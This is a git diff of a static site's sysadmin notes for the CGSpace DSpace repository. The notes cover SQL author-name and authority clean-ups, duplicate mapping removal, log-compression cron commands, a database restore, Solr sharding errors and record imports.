    update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
    -update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
    -update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
    -update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
    -update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
    -update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
    +
    update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
    +update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
    +update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
    +update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
    +update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
    +update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
     

    2016-12-08

    • Something weird happened and Peter Thorne’s names all ended up as “Thorne”, I guess because the original authority had that as its name value:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
         text_value    |              authority               | confidence
     ------------------+--------------------------------------+------------
      Thorne, P.J.     | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
    @@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
     
    • I generated a new UUID using uuidgen | tr [A-Z] [a-z] and set it along with correct name variation for all records:
    -
    dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
    +
    dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
     UPDATE 43
     
    • Apparently we also need to normalize Phil Thornton’s names to Thornton, Philip K.:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
          text_value      |              authority               | confidence
     ---------------------+--------------------------------------+------------
      Thornton, P         | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
    @@ -506,7 +506,7 @@ UPDATE 43
     
    • Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:
    -
    dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
    +
    dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
     UPDATE 362
     
    • It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)
    • @@ -520,8 +520,8 @@ UPDATE 362
    • Set PostgreSQL’s shared_buffers on CGSpace to 10% of system RAM (1200MB)
    • Run the following author corrections on CGSpace:
    -
    dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
    -dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
    +
    dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
    +dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
     
    • The authority IDs were different now than when I was looking a few days ago so I had to adjust them here
    @@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
  • Removing the duplicates in OpenRefine and uploading a CSV to DSpace says “no changes detected”
  • Seems like the only way to sortof clean these up would be to start in SQL:
  • -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
                       text_value                   |              authority               | confidence
     -----------------------------------------------+--------------------------------------+------------
      International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 |         -1
    @@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
      International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |        600
      International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |         -1
      International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 |          0
    -dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
    +dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
     UPDATE 1693
    -dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
    +dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
     UPDATE 35
     
    • Work on article for KM4Dev journal
    • @@ -577,14 +577,14 @@ UPDATE 35
    • So basically, new cron jobs for logs should look something like this:
    • Find any file named *.log* that isn’t dspace.log*, isn’t already zipped, and is older than one day, and zip it:
    -
    # find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
    +
    # find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex ".*\.log.*" ! -iregex ".*dspace\.log.*" ! -iregex ".*\.(gz|lrz|lzo|xz)" ! -newermt "Yesterday" -exec schedtool -B -e ionice -c2 -n7 xz {} \;
     
    • Since there is xzgrep and xzless we can actually just zip them after one day, why not?!
    • We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that
    • I use schedtool -B and ionice -c2 -n7 to set the CPU scheduling to SCHED_BATCH and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less
    • When the tasks are running you can see that the policies do apply:
    -
    $ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
    +
    $ schedtool $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}') && ionice -p $(ps aux | grep "xz /home" | grep -v grep | awk '{print $2}')
     PID 17049: PRIO   0, POLICY B: SCHED_BATCH   , NICE   0, AFFINITY 0xf
     best-effort: prio 7
     
      @@ -679,11 +679,11 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
    • None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then
    • Update some names and authorities in the database:
    -
    dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
    +
    dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
     UPDATE 204
    -dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
    +dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
     UPDATE 89
    -dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
    +dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
     UPDATE 140
     
    • Generated a new UUID for Ben using uuidgen | tr [A-Z] [a-z] as the one in Solr had his ORCID but the name format was incorrect
    • @@ -716,9 +716,9 @@ OCSP Response Data: # su - postgres $ dropdb cgspace $ createdb -O cgspace --encoding=UNICODE cgspace -$ psql cgspace -c 'alter user cgspace createuser;' +$ psql cgspace -c 'alter user cgspace createuser;' $ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup -$ psql cgspace -c 'alter user cgspace nocreateuser;' +$ psql cgspace -c 'alter user cgspace nocreateuser;' $ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost $ vacuumdb cgspace $ psql cgspace diff --git a/docs/2017-01/index.html b/docs/2017-01/index.html index 2071e3034..6175fc5f7 100644 --- a/docs/2017-01/index.html +++ b/docs/2017-01/index.html @@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s I tested on DSpace Test as well and it doesn’t work there either I asked on the dspace-tech mailing list because it seems to be broken, and actually now I’m not sure if we’ve ever had the sharding task run successfully over all these years "/> - + @@ -124,7 +124,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
      • I tried to shard my local dev instance and it fails the same way:
      -
      $ JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace stats-util -s
      +
      $ JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace stats-util -s
       Moving: 9318 into core statistics-2016
       Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
       org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
      @@ -179,15 +179,15 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
       
    • Despite failing instantly, a statistics-2016 directory was created, but it only has a data dir (no conf)
    • The Tomcat access logs show more:
    -
    127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    -127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-17YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 423
    -127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 77
    -127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    -127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 4359517
    -127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16248
    -127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
    -127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update?wt=javabin&version=2 HTTP/1.1" 200 41
    -127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update HTTP/1.1" 200 40
    +
    127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    +127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-17YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 423
    +127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 77
    +127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    +127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 4359517
    +127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16248
    +127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
    +127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update?wt=javabin&version=2 HTTP/1.1" 200 41
    +127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update HTTP/1.1" 200 40
     
    • Very interesting… it creates the core and then fails somehow
    @@ -208,11 +208,11 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
  • I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help
  • For example, this shows 186 mappings for the item, the first three of which are real:
  • -
    dspace=#  select * from collection2item where item_id = '80596';
    +
    dspace=#  select * from collection2item where item_id = '80596';
     
    • Then I deleted the others:
    -
    dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
    +
    dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
     
    • And in the item view it now shows the correct mappings
    • I will have to ask the DSpace people if this is a valid approach
    • @@ -224,19 +224,19 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
    • Error in fix-metadata-values.py when it tries to print the value for Entwicklung & Ländlicher Raum:
    Traceback (most recent call last):
    -  File "./fix-metadata-values.py", line 80, in <module>
    -    print("Fixing {} occurences of: {}".format(records_to_fix, record[0]))
    -UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
    +  File "./fix-metadata-values.py", line 80, in <module>
    +    print("Fixing {} occurences of: {}".format(records_to_fix, record[0]))
    +UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
     
    • Seems we need to encode as UTF-8 before printing to screen, ie:
    -
    print("Fixing {} occurences of: {}".format(records_to_fix, record[0].encode('utf-8')))
    +
    print("Fixing {} occurences of: {}".format(records_to_fix, record[0].encode('utf-8')))
     
    • See: http://stackoverflow.com/a/36427358/487333
    • I’m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database… I’ve never had this issue before
    • Now back to cleaning up some journal titles so we can make the controlled vocabulary:
    -
    $ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
     
    • Now get the top 500 journal titles:
    @@ -255,9 +255,9 @@ UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15:
  • Fix the two items Maria found with duplicate mappings with this script:
  • /* 184 in correct mappings: https://cgspace.cgiar.org/handle/10568/78596 */
    -delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
    +delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
     /* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
    -delete from collection2item where id = '91082';
    +delete from collection2item where id = '91082';
     

    2017-01-17

    • Helping clean up some file names in the 232 CIAT records that Sisay worked on last week
    • @@ -266,15 +266,15 @@ delete from collection2item where id = '91082';
    • And the file names don’t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore
    • Seems like the only ones I should replace are the ' apostrophe characters, as %27:
    -
    value.replace("'",'%27')
    +
    value.replace("'",'%27')
     
    • Add the item’s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:
    -
    value + "__description:" + cells["dc.type"].value
    +
    value + "__description:" + cells["dc.type"].value
     
    • Test importing of the new CIAT records (actually there are 232, not 234):
    -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
     
    • Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB
    • These are scanned from paper and likely have no compression, so we should try to test if these compression techniques help without comprimising the quality too much:
    • @@ -289,7 +289,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
    • In testing a random sample of CIAT’s PDFs for compressability, it looks like all of these methods generally increase the file size so we will just import them as they are
    • Import 232 CIAT records into CGSpace:
    -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
     

    2017-01-22

    • Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace return characters from Excel’s CSV exporter)
    • @@ -300,7 +300,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
    • I merged Atmire’s pull request into the development branch so they can deploy it on DSpace Test
    • Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):
    -
    $ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child="$community" && /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child="$community"; done
    +
    $ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child="$community" && /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child="$community"; done
     
    @@ -311,7 +311,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
  • Run all updates on DSpace Test and reboot the server
  • Run fixes for Journal titles on CGSpace:
  • -
    $ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
    +
    $ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
     
    • Create a new list of the top 500 journal titles from the database:
    diff --git a/docs/2017-02/index.html b/docs/2017-02/index.html index 029e3ec5b..4363ce9f8 100644 --- a/docs/2017-02/index.html +++ b/docs/2017-02/index.html @@ -50,7 +50,7 @@ DELETE 1 Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301) Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name "/> - + @@ -140,7 +140,7 @@ Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name
    • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
    -
    dspace=# select * from collection2item where item_id = '80278';
    +
    dspace=# select * from collection2item where item_id = '80278';
       id   | collection_id | item_id
     -------+---------------+---------
      92551 |           313 |   80278
    @@ -166,7 +166,7 @@ DELETE 1
     
